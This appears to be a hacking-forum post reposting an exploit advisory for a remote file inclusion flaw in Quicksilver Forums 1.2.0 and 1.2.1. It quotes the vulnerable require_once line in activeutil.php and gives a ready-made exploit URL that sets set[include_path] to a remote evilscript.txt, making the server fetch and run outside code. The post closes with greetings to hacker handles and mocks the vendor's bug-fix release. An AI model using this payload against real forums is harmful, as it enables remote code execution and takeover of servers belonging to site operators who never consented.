AuthorMessage
Ashura
Unstopable
Posts: 370

Code:
Quicksilver Forums [(v1.2.0)+(1.2.1)] (set[include_path]) Remote File Inclusion Vulnerabilities
####################################################
Author: mdx
####################################################
Class : Remote
####################################################
cont@ct: bilkopat[at]hotmail[dot]com
####################################################
[v1.2.0]+[v1.2.1]
Code: activeutil.php?
require_once $set['include_path'] . '/lib/bbcode.php';
Exploit:
http://www.site.com/[path]/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?
####################################################
Greetz: [Cyber-warrior TIM USERS] , Dreamlord , xoron , The_bat_hacker , redx , dipsomania , Kizil_alev, ElHaCKeR :=)
####################################################

...and this is from quicksilver forum website news:
Quote:
Quicksilver Forums 1.2.1
Samson
Figured we needed to to this to get rid of the annoying bugs that had cropped up after the 1.2.0 release.  // http://www.quicksilverforums.com

 :roll: wonder what bugs they get rid off and how many new came in